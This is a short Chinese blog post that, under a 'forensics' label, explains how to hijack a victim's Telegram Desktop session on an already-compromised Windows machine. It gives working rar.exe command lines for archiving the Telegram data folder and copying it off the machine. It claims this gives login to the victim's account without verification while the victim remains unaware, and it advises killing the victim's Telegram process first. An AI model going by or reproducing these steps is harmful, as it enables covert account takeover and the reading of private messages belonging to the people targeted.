控制Windows后怎么取证Telegarm呢?RAR解决你的问题!
warning:
这篇文章距离上次修改已过392天,其中的内容可能已经有所变动。
首先,我们要知道Telegarm是可多处同时登陆的,而且收发信息不受影响!
更甚至是目标机TG在线的情况下
我们登陆TG后发送消息,目标机的TG也会毫不知情!
我们先本机安装好rar压缩包。用到了rar压缩包路径中的Rar.exe

具体使用方法如下
1.假如Rar.exe路径是
D:\WinRAR\rar.exe
我可以将Rar.exe复制到目标机任意目录下
假如你复制到对方的目录为:
D:\rar\rar.exe
2.确定对方的TG路径
假如为:D:\Telegram Desktop

3.确定你要压缩到的目录,及文件名
假如为:D:\tg\Telegram.rar
4.cmd执行代码:
D:\rar\rar.exe a -k -r -s -m1 D:\tg\Telegram.rar "D:\Telegram Desktop"

然后找到目标机
D:\tg\
路径,下载解压到本机,打开文件内的Telegram.exe 就直接不需要任何验证登陆上目标TG了!PS:在对方TG登陆的情况下,须先对其结束TG进程,如果路径中带有空格 请添加双引号!
D:\rar\rar.exe a -k -r -s -m1 -x"D:\Telegram Desktop\date\userdate" D:\tg\Telegram.rar "D:\Telegram Desktop" 可以试试这个